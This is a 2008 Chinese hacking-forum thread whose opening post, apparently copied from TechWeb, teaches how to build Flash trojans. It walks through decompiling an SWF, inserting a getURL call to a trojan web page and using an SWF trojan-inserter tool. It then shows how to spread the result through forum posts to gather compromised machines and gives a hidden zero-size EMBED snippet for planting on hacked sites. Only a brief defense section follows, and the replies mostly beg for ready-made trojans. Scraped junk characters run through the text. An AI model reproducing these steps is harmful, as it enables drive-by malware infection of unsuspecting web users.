让〖那一剑の温柔】教你如何制作〖Flash木马程序】以及【如何防止Flash木马程序】

社区服务
高级搜索
猴岛论坛电脑百科让〖那一剑の温柔】教你如何制作〖Flash木马程序】以及【如何防止Flash木马程序】
发帖 回复
倒序阅读 最近浏览的帖子最近浏览的版块
12个回复

让〖那一剑の温柔】教你如何制作〖Flash木马程序】以及【如何防止Flash木马程序】

楼层直达
a51362219

ZxID:1776459

等级: 新兵
那一剑の温柔—天是棺材盖—地是棺材板—喜怒哀乐一切尽在棺材中

举报 只看楼主 使用道具 楼主   发表于: 2008-11-04 0
我首先要说的是认识我的朋友一定知道我上次 发的那张【如何成为一名黑客〗的贴吧
这次我要发的东西相信大家看题目就清楚了吧
那么我们开始吧~~在网站上观看Flash动画,接收到“好友”发来的一张Flash贺卡,甚至于一个QQ魔法表情,一不留神就中了一个木马!Flash动画木马可以说是无处不在,攻击威力和覆盖面极其广。许多朋友一定想了解Flash木马的原理,想知道攻击者是如何在SWF中插入木马的呢?我们应该怎么样来防范Flash木马呢?TechWeb
一、制作Flash动画木马的准备
_1@2{3|$^'M!A程序开发,操作系统,服务器,源码下载,Linux,Unix,BSD,PHP,Apach,asp,下载,源码,黑客,安全,技术社区,技术论坛  Flash动画木马的原理,是在网页中显示或本地直接播放Flash动画木马时,让Flash自动打开一个网址,而该网址就是我们预先制作好的一个木马网页。也就是说,在制作网页木马前,我们首先需要制作好一个网页木马,并将它放置到某个网站上去。
%H8H7W*B%N,|:^4i+p6U  另外,我们还需要准备一个比较吸引人的Flash动画文件“MM热舞.swf”,以及Flash动画反编译工具“闪客精灵”,编辑工具Macromedia Flash MX。
  二、最原始的Flash木马
(X8h4s8G8L"G程序开发,操作系统,服务器,源码下载,Linux,Unix,BSD,PHP,Apach,asp,下载,源码,黑客,安全,技术社区,技术论坛  现在虽然有了许多各种各样的Flash动画木马制作工具,但是为了了解Flash动画木马的最基本原理,有必要从头开始用最原始的方法制作一个Flash木马。
'h'C(U$R'I1L2v"ttech.techweb.com.cn  步骤一:反编译SWF动画-O7c$^,d"h&Q7v5W
  首先我们需要将要插入网页木马的Flash动画文件“MM热舞.swf”,反编译成可编辑的.fla格式。运行“闪客精灵”,点击菜单“文件”→“快速打开”命令,指定“MM热舞.swf”文件将其导入。然后点击工具栏上的“导出FLA”命令,将动画导出为“MM热舞.fla”文件。
5?-^9_-h)b8F3I,E;m5F  步骤二:插入网页木马代码9t!m*W,{5q%\6j"H!]6n"f
  然后运行Flash动画编辑器Macromedia Flash MX,点击菜单“文件”→“打开”,调入刚才保存的fla文件。展开界面下方的“动作/帧”栏,再展开“动作”→“浏览器/网络”项,点击其中的“getURL”命令,在右边窗口中的“URL”里面输入我们的网页木马地址;窗口方式为“_blank”;“变量”设置为“使用GET方式发送”,在下方的代码窗口中将出现“getURL("http://网页木马地址", "_blank", "GET");”。tech.techweb.com.cn ^#o ~4V%{:m5z4E/H b;W
  步骤三:生成Flash木马
-V"L$o(t8H6m9l)rtech.techweb.com.cn  设置完毕后保存文件,并点击菜单“文件”→“发布”命令,将动画重新导出为SWF格式。用IE浏览器打开刚才生成的Flash动画木马,可以看到随着Flash动画打开播放时,自动弹出一个浏览器窗口,里面将会显示我们的木马网页。

接着~~~~~

三、简简单单生成Flash木马tech.techweb.com.cn*S0m7p#o5A p7S#C6l2z&f9e
程序开发,操作系统,服务器,源码下载,Linux,Unix,BSD,PHP,Apach,asp,下载,源码,黑客,安全,技术社区,技术论坛-q"R1h8o8j0Z5c
  上面插入木马的过程比较麻烦,下面我们介绍一个简单的方法,也正是这些简单的工具使得Flash木马在网上随处可见。
6V5n8`!I0R/c6~,e程序开发,操作系统,服务器,源码下载,Linux,Unix,BSD,PHP,Apach,asp,下载,源码,黑客,安全,技术社区,技术论坛+z%m3L'k&}6M2`
  运行SWF木马插入器,点击界面中的“选择”按钮,浏览指定要插入木马的SWF文件;在“插入代码”中输入木马网页的地址;切记不要勾选下面的“只解压”项。设置完毕后,点击“给我插”按钮,程序提示开始插入木马网页。显示成功信息后,关闭程序,用IE打开生成的动画,可以看到自动跳转到木马网页去了。
2v)l8e"^5H9^&[#_!l
9{7l#Z+X"J(P @,B  四、Flash木马的利用
9U+p6W;d;D7e+F9Ktech.techweb.com.cn
4W6Z4W1v4V"}4A/D$t._0_7P1o  看到上面的步骤了吧,生成一个Flash动画木马是不是很简单? 那么生成的Flash木马该如何应用呢?只要我们将Flash上传到某个网站中,就可以通过论坛或网站之类的直接利用了。
#B&c)e#c9A%`-w程序开发,操作系统,服务器,源码下载,Linux,Unix,BSD,PHP,Apach,asp,下载,源码,黑客,安全,技术社区,技术论坛+|,K({&L#P2n:\6^
  大部分的论坛中都可以发来Flash动画的帖子,利用论坛发帖,攻击者可以快速获得大量的肉鸡。以PHPWind v4.3.2 论坛为例,在发帖或回复时,点击编辑窗口上方的“插入Flash动画”按钮,设置Flash窗口大小,使用默认设置后,要求输入Flash的URL地址。确定后,可以看到编辑窗口中显示的代码为““(flash=400,300)hxxp://www.flash**.com.cn/upfiles/20067**.swf(/flash)””,这就是完整的Flash播放代码了,不同的论坛代码是不一样的。TechWeb-技术社区5h4n8X5]/@'G+`'R'i

%`6W'e)~"h  应用二:网页嵌入Flash木马"U3S9Z3v ^
1q8X!h-V+V0T
  攻击者入侵了某个大的网站之后,很可能在网站首页挂马,使用普通方式挂马会被管理员发觉,但是挂上Flash木马的话,是很难查杀的。攻击者可能在网页中插入如下代码:8y1o*@6L&l5k8L

i8a9u%A,h5@/w  “《EMBED src=http://网页木马地址/木马.swf width=0 height=0 type=application/x-shockwave-flash AUTOSTART="false" ShowStatusBar="false"》”,其中的《》改为<>。
$B;{)o,j5C,A.H;Z(sTechWeb-技术社区5L/b)o'K,m:s'i1t
  这里的参数“width=0 height=0”表示,Flash播放窗口为零,也就是不显示Flash播放窗口。其它用户浏览网页时,就会莫名其妙的弹出一个木马网页窗口。
'^9e#G)n:X-j*T
1f6F#k.z&j3G  五、关于Flash木马的防范-V!b2[4K.q3G:B4z"F*T'R7Q
v;x*["n0_7L"|:y3c8e
  其实不管Flash木马有多么的巧妙,最终都是要跳转到木马网页去的,也就是说我们最终要防范的还是网页木马。了解了思路,对于Flash动画木马就简单了:
$F:Z$w#F&Q*L&ytech.techweb.com.cn(b8d0B'w)^-d y
  首先,要开启Windows XP SP2的窗口拦截窗口功能,或安装其它防弹出窗口的插件。如果那个漏网之鱼,莫名其妙弹出的网页窗口要及时的关闭。另外,一定要在上网浏览时开启杀毒软件的网页监控功能,只要网页木马在后台一下载到本地硬盘,就会被杀毒软件查杀,这样就万事无忧了!2@
凉风有性,,,,,,
秋月无边,,,,,,
我自感现在是度日如年.....
a51362219

ZxID:1776459

等级: 新兵
那一剑の温柔—天是棺材盖—地是棺材板—喜怒哀乐一切尽在棺材中

举报 只看该作者 沙发   发表于: 2008-11-04 0
关于我的上一贴如何做一名初级黑客我 把位置发在这里

有兴趣的可以进去慢慢欣赏一下

http://www.houdao.com/read.php?tid=119276
凉风有性,,,,,,
秋月无边,,,,,,
我自感现在是度日如年.....
00251

ZxID:1570866

等级: 中将
╪o其實⒈ 個秂⑧孤單 想1.個人caí孤單﹏oοΟ ⺌

举报 只看该作者 板凳   发表于: 2008-11-04 0
我是菜鸟什么都不懂!
yrz5150383

ZxID:2447639

等级: 列兵
举报 只看该作者 地板   发表于: 2008-11-27 0
看看
看帖要回帖
757528080

ZxID:2374400

等级: 新兵
举报 只看该作者 4楼  发表于: 2008-11-27 0
     看看``

  学学``
jinfengba

ZxID:2516425

等级: 新兵
举报 只看该作者 5楼  发表于: 2008-12-04 0
他妈的太有才了 都是火星文字 怎么看不懂啊 你干脆弄好 给我们一人一个 交好我们怎么用 就可以
"мe騙孓ヽ

ZxID:1725893

等级: 少校

举报 只看该作者 6楼  发表于: 2008-12-06 0
。。。。。 从那个论坛粘来的。
jtltd1

ZxID:2003133

等级: 新兵
举报 只看该作者 7楼  发表于: 2008-12-07 0
你直接给我门1个  我门不懂
陈冠熙

ZxID:2515846

等级: 上等兵
举报 只看该作者 8楼  发表于: 2008-12-07 0
   看不懂。。
    深奥了。。
      
fei360

ZxID:3244764

等级: 新兵
举报 只看该作者 9楼  发表于: 2009-01-15 0
看不懂
sjjetgitx3

ZxID:4916789

等级: 新兵
举报 只看该作者 10楼  发表于: 2009-03-11 0
   这么多软件上那找~
梦幻小小猪

ZxID:4902665

等级: 列兵
举报 只看该作者 11楼  发表于: 2009-03-12 0
把Flash动画发上来啊`。。。怎么还是文字`叫菜鸟们怎么看。。~~
gengyue0502

ZxID:5134685

等级: 新兵
举报 只看该作者 12楼  发表于: 2009-03-22 0
« 返回列表
发帖 回复